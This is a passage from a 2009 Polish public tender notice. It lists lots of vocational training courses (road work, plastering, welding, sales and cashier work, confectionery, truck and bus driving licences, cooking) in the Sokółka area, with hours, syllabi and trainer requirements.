<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.03.2009.</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkolenie: Robotnik drogowy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie pn. Robotnik drogowy
1. Miejsce szkolenia: preferowane miasto Sokółka.
2. Termin szkolenia: II połowa marca - I połowa kwietnia 2009 roku.
3. Liczba dni szkolenia: max. 15 kolejnych dni dla jednej grupy szkoleniowej.
4. Ilość uczestników szkolenia: minimum 12 osób.
5. Zajęcia odbywać się powinny w 1 grupie szkoleniowej.
6. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin. 
7. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 80 godzin, z czego część teoretyczna powinna obejmować minimum 30 godzin, natomiast praktyczna: minimum 50 godzin.
8. Program szkolenia musi obejmować co najmniej następujące zagadnienia:
a) podstawowe zasady BHP - kurs podstawowy;
b) podstawowe zasady BHP przy czyszczeniu i pielęgnacji zieleni na poboczach dróg;
c) bezpieczeństwo na drogach publicznych podczas prowadzenia prac drogowych;
d) posługiwanie się i konserwacja narzędzi i sprzętu,
e) utrzymanie zadrzewienia na poboczach dróg;
f) specyfikacja techniczna robót utrzymaniowych;
g) naprawa poboczy gruntowych;
h) praktyka na ulicach i drogach.
9. Program szkolenia musi być sporządzony ze szczególnym uwzględnieniem zajęć praktycznych tj. uczestnicy szkolenia muszą odbyć część zajęć praktycznych w zakładach prowadzących działalność drogowo-mostową, gdzie będą mieli możliwość poznania charakteru i specyfiki pracy robotnika drogowego i zdobycia umiejętności praktycznych niezbędnych w ww. zawodzie.
10. Kadra dydaktyczna powinna posiadać kwalifikacje i doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia oraz przeprowadzić co najmniej dwa kursy z zakresu przedmiotu zamówienia.

Szkolenie pn. Robotnik drogowy z elementami układania kostki brukowej
1. Miejsce szkolenia: preferowane powiat sokólski.
2. Termin szkolenia: maj - czerwiec 2009 roku.
3. Liczba dni szkolenia: max. 35 kolejnych dni dla jednej grupy szkoleniowej.
4. Ilość uczestników szkolenia: minimum 12 osób.
5. Zajęcia odbywać się powinny w 1 grupie szkoleniowej.
6. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin. 
7. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 230 godzin, z czego część teoretyczna powinna obejmować minimum 50 godzin, natomiast praktyczna: minimum 180 godzin.
8. Program szkolenia musi być sporządzony zgodnie z z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl) oraz musi obejmować co najmniej następujące zagadnienia:
a. rozróżnianie podstawowych materiałów do robót brukarskich,
b. posługiwanie się i konserwacja narzędzi i sprzętu,
c. współpraca przy tyczeniu i czynnościach pomiarowych przy robotach brukarskich, 
d. wyznaczanie profili podłoży i podbudowy, 
e. wykonanie podłoża, podbudowy, podsypek i sprawdzenie szablonem profilu podsypki,
f. układanie krawężników drogowych i obrzeży chodnikowych,
g. brukowanie nawierzchni ulicy z kamieni naturalnych i sztucznych,
h. brukowanie nawierzchni chodników z kostki betonowej i płyt chodnikowych, 
i. brukowanie w ozdobne wzory nawierzchni z różnych typów, 
j. dokonywanie napraw nawierzchni brukowych ulic i chodników, 
k. organizowanie transportu materiałów na budowie, 
l. rozbieranie uszkodzonych bruków i chodników, 
m. zabezpieczanie i oznaczanie robót na czynnych drogach, 
n. utrzymanie stanowiska pracy w odpowiednim porządku i czystości,
o. ścisłą współpracę z operatorami ciężkich maszyn budowlanych i samochodów na budowie,
p. organizowanie toku pracy zgodnie z zasadami BHP i ppoż, a w razie wypadku udzielenie pierwszej pomocy poszkodowanym i powiadomienie odpowiedniej służby ratowniczej.
9. Program szkolenia musi być sporządzony ze szczególnym uwzględnieniem zajęć praktycznych tj. uczestnicy szkolenia muszą odbyć część zajęć praktycznych w zakładach prowadzących działalność drogowo-mostową, gdzie będą mieli możliwość poznania charakteru i specyfiki pracy robotnika drogowego i zdobycia umiejętności praktycznych niezbędnych w ww. zawodzie.
10. Kadra dydaktyczna powinna posiadać kwalifikacje i doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia oraz przeprowadzić co najmniej dwa kursy z zakresu przedmiotu zamówienia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.03.2009.</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szkolenie: Tynkarz elewacji zewnętrznych - docieplanie budynków.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Miejsce szkolenia: preferowane miasto Dąbrowa Białostocka.
2. Termin szkolenia: II połowa marca - kwiecień 2009 roku.
3. Liczba dni szkolenia: max. 40 kolejnych dni dla jednej grupy szkoleniowej.
4. Ilość uczestników szkolenia: minimum 10 osób.
5. Zajęcia odbywać się powinny w 1 grupie szkoleniowej.
6. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin. 
7. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 310 godzin, z czego część teoretyczna powinna obejmować minimum 75 godzin, praktyczna: minimum 175 godzin, natomiast praktyka w zakładach pracy minimum 60 godzin.
8. Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl) oraz obejmować co najmniej wymagane minimum programowe zamieszczone w poniżej:

1. Ogólne wiadomości o budownictwie	
    1. Technologia robót tynkarskich z elementami dociepleń budynków;
    2. Elementy materiałoznawstwa ;
    3. Elementy rysunku zawodowego - czytanie dokumentacji technicznej;
    4. Kalkulacja kosztów;
2. Przepisy BHP
    b. Podstawy i zasady BHP, ppoż.. i ochrony środowiska;
    c. Przepisy BHP przy obsłudze narzędzi i sprzętu oraz transporcie i składowaniu materiałów budowlanych;
    d. Odzież ochronna oraz środki ochrony osobistej;
3. Pierwsza pomoc przedmedyczna	
    1. Udzielanie pierwszej pomocy przedmedycznej;
4. Montaż rusztowań
   1. Montaż rusztowań do tynków zewnętrznych;
5. Wykonywanie tynków zewnętrznych
    1. Prace przygotowawcze związane z przygotowaniem gładzi szpachlowych, w tym przygotowanie  zapraw sposobem ręcznym  i mechanicznym;
    2. Docieplanie;
    3. Tynkowanie;
       a)	wyznaczanie lica tynku;
       b)	przygotowywanie podłoża pod tynk;
       c)	wykonanie tynków ozdobnych;
       d)	wykonanie tynków zewnętrznych szlachetnych;
       e)	wykonanie tynku trójwarstwowego zwykłego-wykonanie tynku doborowego;
       f)	naprawa tynków;
   4. Malowanie;
6. Ogólne wiadomości o budownictwie	
   1. Technologia robót tynkarskich z elementami dociepleń budynków;
   2. Elementy materiałoznawstwa ;
   3. Elementy rysunku zawodowego - czytanie dokumentacji technicznej;
   4. Kalkulacja kosztów;
7. Praktyka w zakładach pracy

9. Kadra dydaktyczna powinna posiadać kwalifikacje i doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia oraz przeprowadzić co najmniej dwa kursy z zakresu przedmiotu zamówienia.

10. Miejsce do przeprowadzenia części praktycznej powinny stanowić obiekty budowlane..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.03.2009.</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Szkolenie: Spawanie metodą MIG / MAG.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie pn. Spawanie stali metodą MIG
1. Miejsce szkolenia: preferowane: miasto Białystok lub Sokółka.
2. Termin szkolenia: kwiecień - I połowa maja 2009 roku.
3. Liczba dni szkolenia: max. 25 kolejnych dni dla jednej grupy szkoleniowej.
4. Ilość uczestników szkolenia: minimum 8 osób.
5. Zajęcia odbywać się powinny w 1 grupie szkoleniowej.
6. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin. 
7. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 151 godzin, z czego część teoretyczna powinna obejmować minimum 31 godzin, natomiast praktyczna: minimum 120 godzin.
8. Instytucja szkoleniowa powinna posiadać atest w zakresie prowadzenia szkoleń spawalniczych zgodnie z Wytycznymi Instytutu Spawalnictwa w Gliwicach oraz licencję lub jednorazową zgodę na egzaminowanie spawaczy po kursach w zakresie spawania.
9. Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl) oraz obowiązującymi Wytycznymi Instytutu Spawalnictwa w Gliwicach. 
10. Kadra dydaktyczna powinna posiadać kwalifikacje i doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia oraz przeprowadzić co najmniej dwa kursy z zakresu przedmiotu zamówienia.

Szkolenie pn. Spawanie stali metodą MAG
1. Miejsce szkolenia: preferowane: miasto Białystok lub Sokółka.
2. Termin szkolenia: najwcześniej od : kwiecień - I połowa maja 2009 roku.
3. Liczba dni szkolenia: max. 25 kolejnych dni dla jednej grupy szkoleniowej.
4. Ilość uczestników szkolenia: minimum 16 osób.
5. Zajęcia odbywać się powinny w 2 grupach szkoleniowych.
6. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin. 
7. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 145 godzin, z czego część teoretyczna powinna obejmować minimum 25 godzin, natomiast praktyczna: minimum 120 godzin.
8. Instytucja szkoleniowa powinna posiadać atest w zakresie prowadzenia szkoleń spawalniczych zgodnie z Wytycznymi Instytutu Spawalnictwa w Gliwicach oraz licencję lub jednorazową zgodę na egzaminowanie spawaczy po kursach w zakresie spawania.
9. Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl) oraz obowiązującymi Wytycznymi Instytutu Spawalnictwa w Gliwicach. 
10. Kadra dydaktyczna powinna posiadać kwalifikacje i doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia oraz przeprowadzić co najmniej dwa kursy z zakresu przedmiotu zamówienia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2009.</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Szkolenie: Sprzedawca - fakturzysta z modułem profesjonalnej obsługi klienta.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Miejsce szkolenia: preferowane miasto Sokółka (I grupa szkoleniowa) i Dąbrowa Białostocka (II grupa szkoleniowa).
2. Termin szkolenia: II połowa maja - czerwiec 2009 roku.
3. Liczba dni szkolenia: max. 30 kolejnych dni dla jednej grupy szkoleniowej.
4. Ilość uczestników szkolenia: minimum 20 osób.
5. Zajęcia odbywać się powinny w 2 grupach szkoleniowych.
6. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin. 
7. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 180 godzin, z czego część teoretyczna powinna obejmować minimum 40 godzin, praktyczna: minimum 80 godzin, natomiast praktyka w zakładach pracy minimum 60 godzin.
8. Kadra dydaktyczna powinna posiadać kwalifikacje i doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia oraz przeprowadzić co najmniej dwa kursy z zakresu przedmiotu zamówienia.
9. Sala wykładowa powinna być dostosowana do ilości osób skierowanych na szkolenie tj. każdy uczestnik szkolenia powinien mieć zapewnione samodzielne stanowisko komputerowe z pełnym legalnym, licencjonowanym oprogramowaniem w polskiej wersji językowej i dostępem do Internetu ora 1 kasę fiskalną.
10. Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl) oraz obejmować co najmniej wymagane minimum programowe zamieszczone w poniżej:
1. Wykorzystanie komputera w sklepie - podstawy obsługi	
    1. Windows;
    2. Microsoft Word;
    3. Microsoft Exel;
    4. Korzystanie z Internetu i poczty elektronicznej.
2. Komputerowe prowadzenie sprzedaży i fakturowanie	
    1. Komunikacja z programem (menu);
    2. Wystawianie dokumentów i rejestracja obrotów magazynowych;
    3. Wystawianie faktur VAT i rachunków uproszczonych oraz dokumentów korygujących za sprzedane towary, materiały, wyroby, usługi i opakowania w cenach sprzedaży brutto lub netto;
    4. Wystawianie paragonu sprzedaży detalicznej;
    5. Prowadzenie kartoteki odbiorców i ewidencji zapłat;
    6. Prowadzenie rejestrów dostawców i odbiorców;
3. Sztuka sprzedaży - zagadnienia teoretyczne	
    1. Warsztat sprzedawcy;
    2. Profesjonalna prezentacja;
    3. Podstawy marketingu i reklamy (strategie reklamowe);
    4. Towaroznawstwo.
4. Obsługa kas fiskalnych	
    1. Sprzedaż, akwizycja, ustawa o podatku od towarów i usług;
    2. Urządzenia usprawniające sprzedaż - kasy rejestrujące, czytniki kodu reskowego;
    3. Kasowe systemy sprzedaży;
    4. Budowa kasy rejestrującej, techniki sprzedaży przy pomocy kasy rejestrującej;
    5. Tablica kodów znakowych;
    6. Programowanie podstawowych parametrów kasy;
    7. Raportowanie kasy;
    8. Przykładowy dzień pracy na kasie fiskalnej;
5. Podstawowe zasady higieny
    1. Źródła zanieczyszczeń mikrobiologicznych i chemicznych żywności;
    2. Choroby przenoszone droga pokarmowa;
    3. Zatrucia pokarmowe i czynniki, które je wywołują;
    4. Zagadnienia zapobiegania zatruciom i zakażeniom pokarmowym;
    5. Zasady racjonalnego żywienia - wpływ żywienia na zdrowie;
6. Kasjer walutowy	
    1. Wybrane przepisy prawa dewizowego; 
    2. Metody identyfikacji znaków pieniężnych;
       a) wspólne cechy monet,
       b) wspólne cechy banknotów,
       c) techniki druku,
       d) zabezpieczenia;
   3. Fałszerskie techniki zastępcze - pozoracja zabezpieczeń występujących na banknotach;
   4. Zasady i tryb postępowania w przypadku ujawnienia banknotu fałszywego lub sfałszowanego;
   5. Ocena jakości banknotów przyjmowanych do kas;
   6. Zasady wymiany pieniędzy zniszczonych;
   7. Szczegółowe omówienie banknotów USD i EURO;
   8. Ćwiczenia polegające na wyszukiwaniu i określaniu zabezpieczeń występujących na banknotach USD i EURO oraz innych walut obcych;
   9. Ćwiczenia polegające na wyszukiwaniu i określaniu zabezpieczeń występujących na banknotach PLN;
7. Wizaż i stylizacja	
8. Przedsiębiorczość:
   1. Prawno-organizacyjne aspekty prowadzenia działalności gospodarczej;
   2. Formy prowadzenia działalności gospodarczej;
   3. Czynności związane z rejestracją działalności gospodarczej;
9. Trening interpersonalny:	
   1. Negocjacje;
   2. Asertywność;
   3. Komunikacja interpersonalna;
   4. Obsługa klienta z wykorzystaniem aktywnych metod sprzedaży;
10. Praktyka w zakładach pracy.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.05.2009.</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Szkolenie: Cukiernik - ciastkarz.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Miejsce szkolenia: preferowane miasto Sokółka.
2. Termin szkolenia: kwiecień 2009 roku.
3. Liczba dni szkolenia: max. 25 kolejnych dni dla jednej grupy szkoleniowej.
4. Ilość uczestników szkolenia: minimum 12 osób.
5. Zajęcia odbywać się powinny w 1 grupie szkoleniowej (poza praktyką w zakładach pracy).
6. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin. 
7. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 164 godziny, z czego część teoretyczna powinna obejmować minimum 49 godzin, natomiast praktyczna: minimum 115 godzin.
8. Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl) oraz obejmować co najmniej wymagane minimum programowe zamieszczone w poniżej:
1. Podstawowe wiadomości z zakresu gastronomii i cukiernictwa	
    1. Terminologia stosowana w gastronomii i cukiernictwie;
    2. Normy pokarmowe. Obliczanie wartości odżywczej potraw. Składniki żywności. Piramida zdrowego żywienia;
    3. Surowce i materiały pomocnicze stosowane w cukiernictwie - sposoby doboru surowców do poszczególnych wyrobów;
    4. Techniki rozpoznawania przydatności surowców do produkcji;
    5. Najnowsze osiągnięcia w dziedzinie gastronomii i cukiernictwa;
2. Przepisy BHP  i HACCP	
    1. Przepisy BHP i ppoż;
    2. Zasady utrzymania Wymogi systemu HACCP;
3. Wyposażenie techniczne	
    1. Nowoczesne urządzenia w gastronomii i cukiernictwie;
    2. Organizacja stanowiska pracy i jego wyposażenie;
    3. Zastosowanie nowoczesnych urządzeń w utrzymaniu wysokiego standardu wyrobów;
4. Technologie prac cukierniczo-ciastkarskich	
    1. Procesy technologiczne stosowane w produkcji wyrobów cukierniczych - obróbka termiczna;
    2. Technologie prac ciastkarsko-cukierniczych;
    3. Receptury różnych wyrobów cukierniczych;
       - sporządzanie różnych rodzajów ciast i wyrobów cukierniczych;
       - sporządzanie kremów, mas i innych półproduktów;
    4. Sposoby dekorowania wykonanych wyrobów;
5. Wyroby cukiernicze na specjalne okazje	
    1. Funkcje stołu bankietowego;
    2. Wyroby bankietowe;
    3. torty, desery, najnowsze dekoracje i zdobienia;
    4. Ekspozycje i aranżacje wyrobów cukierniczych na stołach bankietowych i okolicznościowych;

9. Program szkolenia musi być sporządzony ze szczególnym uwzględnieniem zajęć praktycznych tj. by uczestnicy szkolenia odbyli część zajęć praktycznych w jednostkach typu piekarnie, ciastkarnie, gdzie będą mieli możliwość poznania charakteru i specyfiki pracy cukiernika-ciastkarza i zdobycia umiejętności praktycznych niezbędnych w ww. zawodzie.
10. Kadra dydaktyczna powinna posiadać kwalifikacje i doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia oraz przeprowadzić co najmniej dwa kursy z zakresu przedmiotu zamówienia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2009.</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Szkolenie: Prawo jazdy kat. C, C+E, D od B i D od C.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie pn. Prawo jazdy kategorii C
1. Miejsce szkolenia: preferowane Sokółka lub Białystok.
2. Termin rozpoczęcia szkolenia: po podpisaniu umowy i w terminie do 10 dni od dnia zlecenia przez PUP przeprowadzenia szkolenia.
3. Liczba dni szkolenia: max. 25 kolejnych dni.
4. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin, o ile przepisy szczegółowe dotyczące realizacji szkolenia w w/w zakresie nie stanowią inaczej.
5. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 50 godzin, z czego część teoretyczna powinna obejmować minimum 20 godzin, natomiast praktyczna: minimum 30 godzin.
6. Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl) oraz z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217 poz. 1834 z późn. zm.) oraz z ustawą z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (Dz. U. z 2005 r. Nr 108, poz. 908, z późn. zm.).
7. Kadra dydaktyczna powinna posiadać kwalifikacje i minimum 4-letnie doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia.

Szkolenie pn. Prawo jazdy kategorii C+E 
1. Miejsce szkolenia: preferowane Sokółka lub Białystok.
2. Termin rozpoczęcia szkolenia: po podpisaniu umowy i w terminie do 10 dni od dnia zlecenia przez PUP przeprowadzenia szkolenia.
3. Liczba dni szkolenia: max. 25 kolejnych dni.
4. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin, o ile przepisy szczegółowe dotyczące realizacji szkolenia w w/w zakresie nie stanowią inaczej.
5. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 45 godzin, z czego część teoretyczna powinna obejmować minimum 20 godzin, natomiast praktyczna: minimum 25 godzin.
6. Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl) oraz z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217 poz. 1834 z późn. zm.) oraz z ustawą z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (Dz. U. z 2005 r. Nr 108, poz. 908, z późn. zm.).
7. Kadra dydaktyczna powinna posiadać kwalifikacje i minimum 4-letnie doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia.

Szkolenie pn. Prawo jazdy kategorii D od B
1. Miejsce szkolenia: preferowane Sokółka lub Białystok.
2. Termin rozpoczęcia szkolenia: po podpisaniu umowy i w terminie do 10 dni od dnia zlecenia przez PUP przeprowadzenia szkolenia.
3. Liczba dni szkolenia: max. 40 kolejnych dni.
4. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin, o ile przepisy szczegółowe dotyczące realizacji szkolenia w w/w zakresie nie stanowią inaczej. 
5. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 80 godzin, z czego część teoretyczna powinna obejmować minimum 20 godzin, natomiast praktyczna: minimum 60 godzin.
6. Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl) oraz z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217 poz. 1834 z późn. zm.) oraz z ustawą z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (Dz. U. z 2005 r. Nr 108, poz. 908, z późn. zm.).
7. Kadra dydaktyczna powinna posiadać kwalifikacje i minimum 4-letnie doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia.

Szkolenie pn. Prawo jazdy kategorii D od C 
1. Miejsce szkolenia: preferowane Sokółka lub Białystok.
2. Termin rozpoczęcia szkolenia: po podpisaniu umowy i w terminie do 10 dni od dnia zlecenia przez PUP przeprowadzenia szkolenia.
3. Liczba dni szkolenia: max. 40 kolejnych dni.
4. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin, o ile przepisy szczegółowe dotyczące realizacji szkolenia w w/w zakresie nie stanowią inaczej.
5. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 60 godzin, z czego część teoretyczna powinna obejmować minimum 20 godzin, natomiast praktyczna: minimum 40 godzin.
6. Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl) oraz z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217 poz. 1834 z późn. zm.) oraz z ustawą z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (Dz. U. z 2005 r. Nr 108, poz. 908, z późn. zm.).
7. Kadra dydaktyczna powinna posiadać kwalifikacje i minimum 4-letnie doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Szkolenie: Kucharz z modułem zdobienia potraw i carvingu.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Miejsce szkolenia: preferowane: miasto Sokółka lub Białystok.
2. Termin szkolenia: kwiecień - maj 2009.
3. Liczba dni szkolenia: max. 40 kolejnych dni dla jednej grupy szkoleniowej.
4. Ilość uczestników szkolenia: minimum 10 osób.
5. Zajęcia odbywać się powinny w 1 grupie szkoleniowej (poza częścią praktyczną).
6. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin. 
7. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 270 godzin, z czego część teoretyczna powinna obejmować minimum 60 godzin, natomiast praktyczna: minimum 210 godzin.
8. Kadra dydaktyczna powinna posiadać kwalifikacje i doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia oraz przeprowadzić co najmniej dwa kursy z zakresu przedmiotu zamówienia.
9. Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl) i powinien obejmować co najmniej wymagane minimum programowe zamieszczone w poniżej:
1. Podstawowe wiadomości z zakresu gastronomii	
    1. Terminologia stosowana w gastronomii.
    2. Obliczanie wartości odżywczej pożywienia.
       -składniki żywności,
       -piramida zdrowego żywienia,
    3. Surowce i materiały pomocnicze stosowane w gastronomii.
       -sposoby doboru surowców do poszczególnych wyrobów,
       -techniki rozpoznawania przydatności surowców do produkcji potraw,
   4. Planowanie wyżywienia dla różnych grup ludności.
   5. Planowanie menu na różne okazje.
   6. Najnowsze osiągnięcia w dziedzinie żywności i żywienia.
2. Przepisy BHP i HACCP w gastronomii 	
    1. Przepisy BHP i ppoż.
    2. Wymogi systemu HACCP w gastronomii.
3. Wyposażenie techniczne	
    1. Nowoczesne Urządzenia w gastronomii.
    2. Wyposażenie stanowiska pracy.
    3. Zastosowanie nowoczesnych urządzeń w utrzymaniu wysokiego standardu potraw.
4. Technologie kulinarne potraw	
    1. Procesy technologiczne stosowane w produkcji żywności.
       -obróbka wstępna,
       -obróbka cieplna,
    2. Technologie kulinarne potraw.
